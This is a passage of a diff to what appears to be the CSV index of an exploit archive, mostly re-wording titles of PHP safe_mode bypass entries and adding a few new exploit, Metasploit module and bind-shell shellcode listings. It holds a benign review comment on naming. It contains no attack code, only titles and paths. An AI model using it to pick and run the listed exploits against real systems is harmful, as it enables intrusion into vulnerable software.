+4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0
-4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions Safe_mode and disable_function Bypass",2007-10-22,shinnai,windows,local,0
+4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0
 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0
@@ -6185,7 +6189,7 @@ id,file,description,date,author,platform,type,port
 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0
 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
-7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
+7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
@@ -6194,10 +6198,10 @@ id,file,description,date,author,platform,type,port
 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0
 7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0
 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0
-7393,platforms/linux/local/7393.txt,"PHP - Safe_mode Bypass via proc_open() and custom Environment",2008-12-09,gat3way,linux,local,0
+7393,platforms/linux/local/7393.txt,"PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment",2008-12-09,gat3way,linux,local,0
 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,windows,local,0
 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow",2008-12-17,"Guido Landi",windows,local,0
-7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0
+7503,platforms/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass Exploit",2008-12-17,"Amir Salmani",multiple,local,0
 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0
 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0
 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0
@@ -8293,7 +8297,7 @@ id,file,description,date,author,platform,type,port
 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0
 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0
 28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0
-28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
+28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0
 28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0
 40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
@@ -8322,7 +8326,7 @@ id,file,description,date,author,platform,type,port
 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0
 29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0
-29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0
+29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0
 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0
 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0
 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local,0
@@ -8337,7 +8341,7 @@ id,file,description,date,author,platform,type,port
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0
 30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0
 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
-29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0
+29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0
 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
@@ -8432,14 +8436,14 @@ id,file,description,date,author,platform,type,port
 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0
 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0
 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
-32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
+32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",windows,local,0
 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
 32446,platforms/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0
 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0
 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0
-32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
+32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit",2008-12-31,Mr.SaFa7,php,local,0
 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
 32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
@@ -8459,7 +8463,7 @@ id,file,description,date,author,platform,type,port
 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
-32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0
+32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0
 32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
@@ -9106,6 +9110,7 @@ id,file,description,date,author,platform,type,port
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
 42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
+42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10386,7 +10391,7 @@ id,file,description,date,author,platform,type,port
 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0
 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0
 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0
-9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80
+9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit",2009-09-14,ikki,windows,remote,80
 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0
 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0
 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
@@ -12454,7 +12459,7 @@ id,file,description,date,author,platform,type,port
 21152,platforms/linux/remote/21152.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (1)",2001-11-15,Indigo,linux,remote,0
 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (2)",2001-11-15,Indigo,windows,remote,0
 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0
-21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0
+21155,platforms/php/remote/21155.txt,"PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0
 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0
 21160,platforms/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0
 21161,platforms/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0
@@ -13803,7 +13808,7 @@ id,file,description,date,author,platform,type,port
 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote,0
 27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0
 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0
-27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0
+27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,php,remote,0
 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21
 27526,platforms/windows/remote/27526.txt,"Oracle Java - storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0
 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote,0
@@ -13818,7 +13823,7 @@ id,file,description,date,author,platform,type,port
 27569,platforms/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote,0
 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0
 27595,platforms/php/remote/27595.txt,"PHP 4.x - tempnam() Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
-27596,platforms/php/remote/27596.txt,"PHP 4.x - copy() Function Safe Mode Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
+27596,platforms/php/remote/27596.txt,"PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0
 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
 27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
@@ -14236,7 +14241,7 @@ id,file,description,date,author,platform,type,port
 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
-31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
+31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0
@@ -14698,7 +14703,7 @@ id,file,description,date,author,platform,type,port
 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0
 33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0
 33920,platforms/php/remote/33920.php,"PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote,0
-33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
+33988,platforms/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002
 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0
 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0
@@ -15463,7 +15468,7 @@ id,file,description,date,author,platform,type,port
 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
-40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
+40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
@@ -15595,6 +15600,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
+42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
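Review bot: The new 42256 entry names the product `Easy File Sharing HTTP Server 7.2`, while the existing 42186 context line in a later hunk of this same file names what appears to be the same product and version `Easy File Sharing Web Server 7.2`. If these are the same target, the two spellings will not sort or search together; the index would be more useful with one name, e.g. `Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (Metasploit)`, which also matches the quoting style used on the 42186 line. Worth confirming against the module's own title before changing it.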
@@ -15623,7 +15629,7 @@ id,file,description,date,author,platform,type,port
 41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
-41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
+41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80
 41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0
@@ -15653,6 +15659,8 @@ id,file,description,date,author,platform,type,port
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
+42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
+42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16295,6 +16303,7 @@ id,file,description,date,author,platform,type,port
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
+42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -16580,7 +16589,7 @@ id,file,description,date,author,platform,type,port
 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0
 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection",2006-03-09,DevilBox,asp,webapps,0
 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0
-1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0
+1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit",2006-03-09,nukedx,asp,webapps,0
 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting",2006-03-11,Nomenumbra,php,webapps,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0
@@ -16830,7 +16839,7 @@ id,file,description,date,author,platform,type,port
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0
 1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0
 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
-1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
